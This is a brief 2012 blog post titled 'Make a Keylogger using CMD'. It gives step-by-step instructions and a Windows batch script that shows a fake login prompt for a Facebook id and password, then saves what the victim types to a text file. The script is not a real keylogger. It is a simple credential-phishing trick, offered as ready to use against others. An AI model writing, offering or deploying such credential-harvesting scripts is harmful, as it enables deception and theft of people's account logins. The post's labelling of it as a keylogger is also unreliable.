Tuesday, February 28, 2012

Make a Keylogger using CMD



1. open notepad

2. type this code

@echo off
color f
cls
echo PLEASE LOGIN WID UR E-MAIL ID
echo
set/p user=Facebook id:
set/p pass=Password:
cls

echo username=%user% paswword=%pass% >notepad.txt


3. now save this file login.bat

now ur keylogger is ready to use.........


No comments:

Post a Comment